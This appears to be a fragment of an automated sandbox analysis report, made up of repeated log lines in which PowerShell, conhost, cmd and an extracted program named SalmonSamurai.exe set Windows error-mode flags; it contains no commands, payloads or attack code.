Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
